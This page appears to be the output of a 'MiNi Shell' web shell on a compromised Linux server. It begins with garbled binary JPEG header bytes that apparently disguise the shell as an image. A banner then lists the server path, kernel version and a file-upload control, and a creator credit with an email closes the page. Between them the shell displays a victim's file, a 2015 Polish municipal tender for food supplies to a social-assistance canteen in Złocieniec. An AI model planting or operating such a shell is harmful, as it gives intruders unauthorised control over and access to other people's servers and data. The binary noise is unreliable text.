JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150129/21182-N-2015.html

<p class="kh_header"><b>Złocieniec: Dostawa żywności do stołówki MGOPS w Złocieńcu w podziale na zadania częściowe w 2015r.</b><br>
<b>Numer ogłoszenia: 21182 - 2015; data zamieszczenia: 29.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , Plac 650-lecia 1, 78-520 Złocieniec, woj. zachodniopomorskie, tel. 94 3671248, faks 94 3672767.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności do stołówki MGOPS w Złocieńcu w podziale na zadania częściowe w 2015r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa żywności do stołówki MGOPS w Złocieńcu w 2015r.  w podziale na następujące zadania częściowe: 
Zadanie częściowe nr 1- mięso, wędliny, konserwy mięsne, drób, wędlina drobiowa
o szacunkowych ilościach
MIĘSO
1.	łopatka b/k	kg	1200
2.	karkówka b/k	kg	200
3.	schab b/k	kg	320
4.	żeberka wieprzowe	kg	200
5.	słonina	kg	400
6.	kości wieprzowe	szt	300
WĘDLINA
1.	boczek wędzony	kg	500
2.	łopatka wędzona	kg	150
3.	kaszanka	kg	200
4.	martadela	kg	90
5.	kiełbasa typu pomorska	kg	70
6.	kiełbasa typu francuska	kg	150
7.	kiełbasa typu kanapkowa	kg	100
8.	kielbasa typu popularna	kg	300
9.	kielbasa typu śląska	kg	250
10.	kiełbasa typu biała	kg	200
11.	kielbasa typu sucha toruńska	kg	150
12.	baleron gotowany	kg	100
13.	szynkowa typu kanapkowe	kg	100
14.	ogonówka parzona	kg	120
15.	pieczenie różne	kg	200
16.	parówka wieprzowa	kg	200
 DRÓB
1.	piersi drobiowe	kg	460
2.	wątróbka drobiowa	kg	90
3.	udka kurczaka extra	kg	200
WĘDLINY DROBIOWE
1.	polędwica drobiowa	kg	150
2.	kiełbasa typu krakowska drobiowa parzona	kg	80
3.	kiełbasa szynkowa z indyka	kg	100
4.	medaliony drobiowe	kg	130
5.	kurczak typu Po zbóju	kg	56
6.	filet drobiowy zapiekany	kg	30
7.	skrzydełka wędzone	kg	100
8.	Parówki drobiowe	kg	200
KONSERWY  MIĘSNE
1.	Głowizna   300 gr	   szt	720
2.	Flaki           500 gr	    szt	2 100
3.	Konserwa pulpety 500gr	    szt	3 900
4.	Konserwa SYTA 300gr. AGROS	    szt	1 200
5.	Konserwa 300gr mięsna typu Tyrolska lunch, Przysmak ,śniadaniowy	    szt	5 400
6.	Konserwa szynka 155gr	    szt	1 000
7.	Konserwa mięsna  131 gr	    szt	2 050
8.	Pasztet 300gr wieprz-drob.	    szt	3 700
9.	Pasztet 110gr wieprz.	    szt	3 000
10.	Paprykarz wieprz -dr. 300gr	    szt	1 500
11. Smalec  125gr z ceb.	    szt	3 000

zadanie częściowe nr 2 - warzywa i owoce o szacunkowych ilościach
1.	buraki	 kg	        800    
2.	czosnek polski	szt	        200    
3.	cebula	kg	        800    
4.	czarna rzepa	kg	        100    
5.	kapusta biała	kg	     1 200    
6.	kapusta czerwona	kg	        200    
7.	kapusta włoska	kg	           60    
8.	kapusta  pekińska	kg	           80    
9.	kalafior	kg	        300    
10.	marchew	kg	     1 200    
11.	pietruszka	kg	        250    
12.	por	kg	        300    
13.	pomidor	kg	           60    
14.	papryka świeża	kg	           20    
15.	seler	kg	        250    
16.	szczypior	kg	           30    
17.	groch suchy	kg	        200    
18.	fasola sucha	kg	        250    
19.	ogórki świeże	kg	        150    
20.	pieczarki	kg	        250    
21.	jabłka	kg	           20    
22.	kapusta kwaszona	kg	        800    
23.	ogórki kwaszone	kg	        450    
24.	ziemniaki stare	kg	   16 000    
25.	ziemniaki młode	kg	     2 000    
Zadanie częściowe nr 3 - ARTYKUŁY SPOŻYWCZE o szacunkowych ilościach
1.	biały barszcz 65g	szt.	200
2.	żurek 49g	szt.	250
3.	chrzan tarty 270g	szt.	32
4.	degusta 200g	szt.	60
5.	fasolka kon. 470g	szt.	100
6.	groszek kon. 400g	szt.	60
7.	kwasek cytrynowy 20g	szt.	50
8.	Koncentrat pom. 4550g  typu BAŻANT	szt.	20
9.	kukurydza 360g	szt.	40
10.	liść laurowy 6g	szt.	40
11.	majonez 0,9l	szt.	10
12.	musztarda 190g	szt.	32
13.	majeranek 7g	szt.	150
14.	ogórki konserwowe 0,9	szt.	320
15.	olej 1l	szt.	200
16.	ocet 0,5l	szt.	20
17.	pieprz mielony 20g	szt.	400
18.	pieprz ziołowy 20g	szt.	300
19.	makaron  1kg	szt.	600
20.	mąka ziemniaczana 500g	szt.	20
21.	mąka koszalińska	kg	250
22.	kasza jęczmienna 1kg	szt.	250
23.	cukier	kg	60
24.	ryż długoziarnisty	kg	250
25.	sól	kg	500
26.	papryka mielona 20g	szt.	40
27.	przyprawa do kurczaka 50g	szt.	10
28.	papryka konserwowa 4250g	szt.	15
29.	Przecier ogórkowy 0.9   	szt.	60
30.	Syropy owocowe 335 g  	szt.	900
31.	Sos boloński         42g   	szt.	100
32.	Sos pieczeniowy    30g   	szt.	60
33.	Szczaw konserwowy 0.9 	szt.	80
34.	Ziele ang.     15g             	szt.	40
35.	Zupa ogonowa  65g         	szt.	200
36.	Maggi   900g                   	szt.	60
zadanie częściowe nr 4  PIECZYWO o szacunkowych ilościach
PIECZYWO
1.	chleb pszenny 600g	szt.	   18 000    
2.	babka piaskowa z polewą	szt.	        500    
3.	bułka tarta	kg	           60    
zadanie częściowe nr 5 Ryby o szacunkowych ilościach 
RYBY
1.	kostka rybna panierowana	kg	        150    
2.	kotlety rybne z warzywami	kg	        150    
3.	filet z miruny	kg	        160    
4.	matias płat śledziowy	kg	        270    
5.	sałatka rybna 150g	szt	        750    
6.	sałatka rybna 130g	szt	        750    
7.	konserw rybna 160g w oleju	szt	     1 000    
8.	konserwa rybna 160g w pomidorach	szt	     1 000    
zadanie częściowe nr 6  Jaja o szacunkowych ilościach
JAJA
1.	jaja 60-65g	szt.	     6 000    
zadanie częściowe nr 7 Nabiał o szacunkowych ilościach
NABIAŁ
1.	jogurt typu gratka 115g	szt	     1 500    
2.	jogurt naturalny 180g	szt	     1 000    
3.	jogurt typu jogobella 150g	szt	     1 500    
4.	serek topiony kostka 100g	szt	     3 000    
5.	serek topiony kiełbaski 100g	szt	     1 500    
6.	serek kanapkowy 150g	szt	        750    
7.	ser twardy plastry 150g	szt	        750    
8.	Smarowidło typu Dobry śmietankowy 200g	szt	     2 200    
9.	margaryna typu  marcysia 500g	szt	     4 000    
10.	margaryna typu palma 250g	szt	        800    
11.	śmietana 400g 18%	szt	     1 500    
12.	twaróg półtłusty extra 	kg	        200    
Zamawiający nie przewiduje możliwości udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7 ustawy. Zamawiający nie dopuszcza złożenia oferty wariantowej. 
Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną, kilka, lub wszystkie grupy zamówienia. Oferta częściowa musi obejmować wszystkie pozycje określone w danej grupie. 
Zadanie częściowe nr 1- MIĘSO, WĘDLINY, KONSERWY MIĘSNE, DRÓB, WĘDLINA DROBIOWA
Zadanie częściowe nr 2  WARZYWA I OWOCE
Zadanie częściowe nr 3  ARTYKUŁY SPOŻYWCZE
Zadanie częściowe nr 4  PIECZYWO
Zadanie częściowe nr 5  RYBY I KONSERWYT RYBNE
Zadanie częściowe nr 6   JAJA
Zadanie częściowe nr  7  NABIAŁ
Wykonawca zobowiązany będzie do dostarczenia przedmiotu zamówienia wynikającego 
z zawartej umowy do Stołówki MGOPS w Złocieńcu przy ul. Piaskowej 4 
w godzinach 700 do 1000 po uprzednim zamówieniu telefonicznym przez pracownika Stołówki oraz wniesienia przedmiotu zamówienia do pomieszczeń wskazanych przez Zamawiającego. 
Podane ilości produktów w poszczególnych zadaniach są szacunkowe i mogą ulec zmianie. Służyć one będą wyłącznie do porównania ofert oraz wybrania oferty najkorzystniejszej, tzn. że nie stanowią ostatecznego rozmiaru zamówienia, w wyniku czego, nie mogą stanowić podstaw do zgłaszania roszczeń z tytułu niezrealizowanych dostaw albo podstawy do odmowy realizacji dostaw. Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych zmniejszeniem ilości i wartości dostaw. Zamawiającemu przysługuje prawo zamawiania poszczególnych pozycji asortymentowych w innych ilościach niż wynika to z opisu przedmiotu zamówienia pod warunkiem, że łączna wartość dostaw nie przekroczy wartości umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 03.22.00.00-9, 03.21.00.00-6, 03.31.13.00-5, 03.31.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie zamawiający nie wymaga od wykonawcy spełnienia warunków szczegółowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie zamawiający nie wymaga od wykonawcy spełnienia warunków szczegółowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie zamawiający nie wymaga od wykonawcy spełnienia warunków szczegółowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie zamawiający nie wymaga od wykonawcy spełnienia warunków szczegółowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie zamawiający nie wymaga od wykonawcy spełnienia warunków szczegółowych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - produkty ekologiczne - 1</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgops.zlocieniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko Gminny Ośrodek Pomocy Społecznej  w Złocieńcu
Plac 650 Lecia 1
78-520 Złocieniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2015 godzina 12:00, miejsce: Miejsko Gminny Ośrodek Pomocy Społecznej  w Złocieńcu
Plac 650 Lecia 1
78-520 Złocieniec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com